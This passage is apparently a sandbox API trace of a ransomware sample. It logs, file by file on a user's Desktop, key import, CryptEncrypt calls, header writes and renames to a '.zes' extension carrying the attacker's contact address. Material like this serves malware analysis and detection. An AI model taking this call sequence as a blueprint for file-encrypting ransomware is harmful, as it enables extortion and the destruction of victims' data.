lpNewFilePointer=0x0) returned 1 [0134.144] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.144] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.144] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.144] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.144] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x12b12, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x12b12, lpOverlapped=0x0) returned 1 [0134.145] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x12b20, dwBufLen=0x12b20 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x12b20) returned 1 [0134.146] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.146] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x12b20, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x12b20, lpOverlapped=0x0) returned 1 [0134.146] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.146] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x12be4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.146] SetEndOfFile (hFile=0x124) returned 1 [0134.149] GetProcessHeap () returned 0x520000 [0134.149] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53a5f8 | out: hHeap=0x520000) returned 1 [0134.149] GetProcessHeap () returned 0x520000 [0134.149] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.149] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\K8FlFC.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\k8flfc.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\K8FlFC.pdf.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\k8flfc.pdf.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.154] CloseHandle (hObject=0x124) returned 1 [0134.154] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.154] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24c39980, ftCreationTime.dwHighDateTime=0x1d5d7c7, ftLastAccessTime.dwLowDateTime=0xdf1331b0, ftLastAccessTime.dwHighDateTime=0x1d5d9b6, ftLastWriteTime.dwLowDateTime=0xdf1331b0, ftLastWriteTime.dwHighDateTime=0x1d5d9b6, nFileSizeHigh=0x0, nFileSizeLow=0xa597, dwReserved0=0x0, dwReserved1=0xffff, cFileName="l3CDAV63MRYTd8k.png", cAlternateFileName="L3CDAV~1.PNG")) returned 1 [0134.154] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l3CDAV63MRYTd8k.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l3cdav63mrytd8k.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.154] GetProcessHeap () returned 0x520000 [0134.154] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.155] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.155] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.155] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x9, lpOverlapped=0x0) returned 1 [0134.156] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.156] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.156] GetProcessHeap () returned 0x520000 [0134.156] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.156] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50) returned 1 [0134.156] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.156] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x50, lpOverlapped=0x0) returned 1 [0134.156] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.156] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.156] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.157] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.157] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.157] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.157] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.157] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.157] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0xa597, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0xa597, lpOverlapped=0x0) returned 1 [0134.157] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0xa5a0, dwBufLen=0xa5a0 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0xa5a0) returned 1 [0134.158] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.158] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0xa5a0, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0xa5a0, lpOverlapped=0x0) returned 1 [0134.158] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.158] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xa684, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.158] SetEndOfFile (hFile=0x124) returned 1 [0134.162] GetProcessHeap () returned 0x520000 [0134.162] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.162] GetProcessHeap () returned 0x520000 [0134.162] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.162] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l3CDAV63MRYTd8k.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l3cdav63mrytd8k.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l3CDAV63MRYTd8k.png.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l3cdav63mrytd8k.png.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.165] CloseHandle (hObject=0x124) returned 1 [0134.165] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.165] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd706990, ftCreationTime.dwHighDateTime=0x1d5d876, ftLastAccessTime.dwLowDateTime=0x1e5a9d50, ftLastAccessTime.dwHighDateTime=0x1d5e55a, ftLastWriteTime.dwLowDateTime=0x1e5a9d50, ftLastWriteTime.dwHighDateTime=0x1d5e55a, nFileSizeHigh=0x0, nFileSizeLow=0x39d1, dwReserved0=0x0, dwReserved1=0xffff, cFileName="MkSA.m4a", cAlternateFileName="")) returned 1 [0134.165] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MkSA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mksa.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.166] GetProcessHeap () returned 0x520000 [0134.166] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.166] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.166] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.166] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0xf, lpOverlapped=0x0) returned 1 [0134.167] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.167] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.167] GetProcessHeap () returned 0x520000 [0134.167] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x30) returned 0x53a568 [0134.167] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53a568*, pdwDataLen=0x23ffc78*=0x30, dwBufLen=0x30 | out: pbData=0x53a568*, pdwDataLen=0x23ffc78*=0x30) returned 1 [0134.167] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.167] WriteFile (in: hFile=0x124, lpBuffer=0x53a568*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x53a568*, lpNumberOfBytesWritten=0x23ffc90*=0x30, lpOverlapped=0x0) returned 1 [0134.167] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.167] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.167] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.167] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.167] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.167] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.167] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.167] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.167] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x39d1, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x39d1, lpOverlapped=0x0) returned 1 [0134.168] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x39e0, dwBufLen=0x39e0 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x39e0) returned 1 [0134.168] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.168] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x39e0, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x39e0, lpOverlapped=0x0) returned 1 [0134.168] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.168] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x3aa4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.168] SetEndOfFile (hFile=0x124) returned 1 [0134.171] GetProcessHeap () returned 0x520000 [0134.171] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53a568 | out: hHeap=0x520000) returned 1 [0134.171] GetProcessHeap () returned 0x520000 [0134.171] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.171] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MkSA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mksa.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MkSA.m4a.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mksa.m4a.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.177] CloseHandle (hObject=0x124) returned 1 [0134.177] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.177] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5775f30, ftCreationTime.dwHighDateTime=0x1d5db2d, ftLastAccessTime.dwLowDateTime=0xbe382010, ftLastAccessTime.dwHighDateTime=0x1d5deaf, ftLastWriteTime.dwLowDateTime=0xbe382010, ftLastWriteTime.dwHighDateTime=0x1d5deaf, nFileSizeHigh=0x0, nFileSizeLow=0xc05e, dwReserved0=0x0, dwReserved1=0xffff, cFileName="Ml-L2Mnu1hfDn3Ebw.png", cAlternateFileName="ML-L2M~1.PNG")) returned 1 [0134.177] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ml-L2Mnu1hfDn3Ebw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ml-l2mnu1hfdn3ebw.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.177] GetProcessHeap () returned 0x520000 [0134.178] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.178] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.178] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.178] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x2, lpOverlapped=0x0) returned 1 [0134.179] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.179] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.179] GetProcessHeap () returned 0x520000 [0134.179] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.179] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50) returned 1 [0134.179] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.179] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x50, lpOverlapped=0x0) returned 1 [0134.179] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.179] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.179] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.180] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.180] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.180] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.180] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.180] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.180] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0xc05e, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0xc05e, lpOverlapped=0x0) returned 1 [0134.180] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0xc060, dwBufLen=0xc060 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0xc060) returned 1 [0134.181] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.182] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0xc060, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0xc060, lpOverlapped=0x0) returned 1 [0134.182] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.182] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xc144, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.182] SetEndOfFile (hFile=0x124) returned 1 [0134.211] GetProcessHeap () returned 0x520000 [0134.212] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.212] GetProcessHeap () returned 0x520000 [0134.212] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.212] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ml-L2Mnu1hfDn3Ebw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ml-l2mnu1hfdn3ebw.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ml-L2Mnu1hfDn3Ebw.png.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ml-l2mnu1hfdn3ebw.png.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.216] CloseHandle (hObject=0x124) returned 1 [0134.216] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.216] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f7a0020, ftCreationTime.dwHighDateTime=0x1d5e593, ftLastAccessTime.dwLowDateTime=0x208c23e0, ftLastAccessTime.dwHighDateTime=0x1d5d994, ftLastWriteTime.dwLowDateTime=0x208c23e0, ftLastWriteTime.dwHighDateTime=0x1d5d994, nFileSizeHigh=0x0, nFileSizeLow=0x11aed, dwReserved0=0x0, dwReserved1=0xffff, cFileName="NZt4WTx8.ots", cAlternateFileName="")) returned 1 [0134.216] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NZt4WTx8.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nzt4wtx8.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.216] GetProcessHeap () returned 0x520000 [0134.216] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.216] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.216] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.216] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x3, lpOverlapped=0x0) returned 1 [0134.217] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.217] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.217] GetProcessHeap () returned 0x520000 [0134.218] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.218] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40) returned 1 [0134.218] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.218] WriteFile (in: hFile=0x124, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ffc90*=0x40, lpOverlapped=0x0) returned 1 [0134.218] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.218] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.218] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.218] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.218] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.218] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.218] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.218] 